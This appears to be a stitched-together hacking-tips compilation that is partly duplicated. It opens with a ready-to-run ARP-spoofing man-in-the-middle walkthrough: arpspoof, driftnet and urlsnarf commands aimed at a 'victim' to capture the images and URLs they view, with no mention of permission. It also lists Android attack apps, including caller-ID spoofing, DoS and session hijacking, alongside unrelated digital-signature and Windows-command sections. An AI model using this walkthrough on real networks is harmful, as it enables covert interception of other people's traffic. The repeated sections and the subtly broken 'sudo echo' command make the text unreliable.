Man in the middle attack-

The man-in-the-middle attack (MITM, MIM,
MITMA) in cryptography and computer security is a form of active eavesdropping in
which the attacker makes independent connections with the victims and relays messages between them, making them
believe that they are talking directly to each other over a private connection, when in fact
the entire conversation is controlled by the attacker.it means attacker is in between both
victim and watch thier messages.
required tool-
1. Arpspoof
2. Driftnet
3. Urlsnarf
Arpspoof:- We use it twice
1. To lie to the Gateway about the MAC
address of victim
MAC Address of Victim is that of Back-
Track’s
2. To lie to the Victim about the MAC address of Gateway
MAC Address of Gateway is that of Back-Track’s
Driftnet:- Displays the Graphics, that Victim browses over Internet

Urlsnarf:- Gives the details of URLs, that Victim visits
Steps for that attack-
1) To accomplish this we will modify the IP
Tables and turn Linux into a router.
cat /proc/sys/net/ipv4/ip_forward
2) The default value is “0”. It should be set
to 1. To change the value to 1 enter the
following command:
sudo echo 1 >> /proc/sys/net/ipv4/
ip_forward
3) Now go ahead and check out the
ip_forward file and make sure the value
equals “1”
cat /proc/sys/net/ipv4/ip_forward
4) An arp poisoning attack will redirect data
from the victim’s PC going to their gateway
to be redirected to our box (note you have to
be on the same physical device, such as a
switch or access point to accomplish this).
sudo arpspoof –i eth1 –t 192.168.1.138
192.168.1.1
5) We will now use another arp poisoning
attack to redirect data from the gateway
destined for the victim’s PC back to our
Linux box.
sudo arpspoof –i eth1 –t 192.168.1.1
192.168.1.137
6) Now we launch driftnet. It is listening.
sudo driftnet –i eth1
7) As the victim’s PC browsing the Internet,
images that show up in his web browser are
also displayed on the attacker’s Linux server.
8) The attacker PC launches urlsnarf. URLs
that are accessed on the victim’s PC are
displayed on the attacker’s Linux server

Ten hacking tools for android

1.SpoofApp
SpoofApp is a Caller ID Spoofing, Voice
Changing and Call Recording mobile app for
your iPhone, BlackBerry and Android phone.
It's a decent mobile app to help protect your
privacy on the phone. However, it has been
banned from the Play Store for allegedly
being in conflict with The Truth in Caller ID
Act of 2009.

2.Andosid
The DOS tool for Android Phones allows
security professionals to simulate a DOS
attack (an http post flood attack to be exact)
and of course a dDOS on a web server, from
mobile phones.

3.Faceniff
Allows you to sniff and intercept web session
profiles over the WiFi that your mobile is
connected to. It is possible to hijack sessions
only when WiFi is not using EAP, but it
should work over any private networks.

4.Nmap
Nmap (Network Mapper) is a security
scanner originally written by Gordon Lyon
used to discover hosts and services on a
computer network, thus creating a "map" of
the network. To accomplish its goal, Nmap
sends specially crafted packets to the target
host and then analyses the responses.

5.Anti-Android Network Toolkit
zANTI is a comprehensive network
diagnostics toolkit that enables complex
audits and penetration tests at the push of a
button. It provides cloud-based reporting
that walks you through simple guidelines to
ensure network safety.

6.SSHDroid
SSHDroid is a SSH server implementation for
Android. This application will let you connect
to your device from a PC and execute
commands (like "terminal" and "adb shell")
or edit files (through SFTP, WinSCP,
Cyberduck, etc).

7.WiFi Analyser
Turns your android phone into a Wi-Fi
analyser. Shows the Wi-Fi channels around
you. Helps you to find a less crowded
channel for your wireless router.

8.Network Discovery
Discover hosts and scan their ports in your
Wifi network. A great tool for testing your
network security.

9.ConnectBot
ConnectBot is a powerful open-source
Secure Shell (SSH) client. It can manage
simultaneous SSH sessions, create secure
tunnels, and copy/paste between other
applications. This client allows you to
connect to Secure Shell servers that typically
run on UNIX-based servers.

10.dSploit
Android network analysis and penetration
suite offering the most complete and
advanced professional toolkit to perform
network security assesments on a mobile
device.

What is a digital signature?

Part 1
There are different types of digital
signatures; this tip focuses on digital
signatures for email messages. You may have
received emails that have a block of letters
and numbers at the bottom of the message.
Although it may look like useless text or
some kind of error, this information is
actually a digital signature. To generate a
signature, a mathematical algorithm is used
to combine the information in a key with the
information in the message. The result is a
random-looking string of letters and
numbers.
Why would you use one?
Because it is so easy for attackers and
viruses to "spoof" email addresses , it is
sometimes difficult to identify legitimate
messages. Authenticity may be especially
important for business correspondence—if
you are relying on someone to provide or
verify information, you want to be sure that
the information is coming from the correct
source. A signed message also indicates that
changes have not been made to the content
since it was sent; any changes would cause
the signature to break.
How does it work?
Before you can understand how a digital
signature works, there are some terms you
should know:
Keys - Keys are used to create digital
signatures. For every signature, there is a
public key and a private key.
Private key - The private key is the portion of
the key you use to actually sign an email
message. The private key is protected by a
password, and you should never give your
private key to anyone.
Public key - The public key is the portion of
the key that is available to other people.
Whether you upload it to a public key ring
or send it to someone, this is the key other
people can use to check your signature. A
list of other people who have signed your
key is also included with your public key.
You will only be able to see their identities if
you already have their public keys on your
key ring.
Key ring - A key ring contains public keys.
You have a key ring that contains the keys of
people who have sent you their keys or
whose keys you have gotten from a public
key server. A public key server contains keys
of people who have chosen to upload their
keys.
What is a digital signature? Part 2

Fingerprint - When confirming a key, you will
actually be confirming the unique series of
letters and numbers that comprise the
fingerprint of the key. The fingerprint is a
different series of letters and numbers than
the chunk of information that appears at the
bottom of a signed email message.
Key certificates - When you select a key on a
key ring, you will usually see the key
certificate, which contains information about
the key, such as the key owner, the date the
key was created, and the date the key will
expire.
"Web of trust" - When someone signs your
key, they are confirming that the key
actually belongs to you. The more signatures
you collect, the stronger your key becomes.
If someone sees that your key has been
signed by other people that he or she trusts,
he or she is more inclined to trust your key.
Note: Just because someone else has trusted
a key or you find it on a public key ring does
not mean you should automatically trust it.
You should always verify the fingerprint
yourself.
The process for creating, obtaining, and
using keys is fairly straightforward:
Generate a key using software such as PGP,
which stands for Pretty Good Privacy, or
GnuPG, which stands for GNU Privacy Guard.
Increase the authenticity of your key by
having your key signed by co-workers or
other associates who also have keys. In the
process of signing your key, they will
confirm that the fingerprint on the key you
sent them belongs to you. By doing this, they
verify your identity and indicate trust in your
key.
Upload your signed key to a public key ring
so that if someone gets a message with your
signature, they can verify the digital
signature.
Digitally sign your outgoing email messages.
Most email clients have a feature to easily
add your digital signature to your message.

ABCD... OF CYBERS

A-Apple
B-Bluetooth
C-Chatting
D-Download
E-Email
F-Facebook
G-Google
H-Hotmail
I-Iphone
J-Java
K-Kingston
L-Laptop
M-Message
N-Nero
O-Orkut
P-Picasa
Q-Quick time
R-RAM
S-Server
T-TechNotification
U-USB
V-Vista
W-Wifi
X-XP
Y-Yahoo!
Z-Zorpia.

Some Useful Run Short Commands

:Example : Go > Run > Type control.exe
admintools
Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control.exe admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
Date and Time Properties
timedate.cpl
DDE Shares
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (if installed)
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control.exe desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab
Preselected)
control.exe color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control.exe folders
Fonts
control.exe fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
Java Control Panel (if installed)
jpicpl32.cpl
Java Control Panel (if installed)
javaws
Keyboard Properties
control.exe keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Microsoft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control.exe mouse
Mouse Properties
main.cpl
Network Connections
control.exe netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Nview Desktop Manager (if installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (if installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control.exe printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy
rsop.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control.exe schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility
sfc
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad
write

Ten hacking tools for android

1.SpoofApp
SpoofApp is a Caller ID Spoofigng, Voice
Changing and Call Recording mobile app for
your iPhone, BlackBerry and Android phone.
It's a decent mobile app to help protect your
privacy on the phone. However, it has been
banned from the Play Store for allegedly
being in conflict with The Truth in Caller ID
Act of 2009.
2.Andosid
The DOS tool for Android Phones allows
security professionals to simulate a DOS
attack (an http post flood attack to be exact)
and of course a dDOS on a web server, from
mobile phones.
3.Faceniff
Allows you to sniff and intercept web session
profiles over the WiFi that your mobile is
connected to. It is possible to hijack sessions
only when WiFi is not using EAP, but it
should work over any private networks.
4.Nmap
Nmap (Network Mapper) is a security
scanner originally written by Gordon Lyon
used to discover hosts and services on a
computer network, thus creating a "map" of
the network. To accomplish its goal, Nmap
sends specially crafted packets to the target
host and then analyses the responses.
5.Anti-Android Network Toolkit
zANTI is a comprehensive network
diagnostics toolkit that enables complex
audits and penetration tests at the push of a
button. It provides cloud-based reporting
that walks you through simple guidelines to
ensure network safety.
6.SSHDroid
SSHDroid is a SSH server implementation for
Android. This application will let you connect
to your device from a PC and execute
commands (like "terminal" and "adb shell")
or edit files (through SFTP, WinSCP,
Cyberduck, etc).
7.WiFi Analyser
Turns your android phone into a Wi-Fi
analyser. Shows the Wi-Fi channels around
you. Helps you to find a less crowded
channel for your wireless router.
8.Network Discovery
Discover hosts and scan their ports in your
Wifi network. A great tool for testing your
network security.
9.ConnectBot
ConnectBot is a powerful open-source
Secure Shell (SSH) client. It can manage
simultaneous SSH sessions, create secure
tunnels, and copy/paste between other
applications. This client allows you to
connect to Secure Shell servers that typically
run on UNIX-based servers.
10.dSploit
Android network analysis and penetration
suite offering the most complete and
advanced professional toolkit to perform
network security assesments on a mobile
device.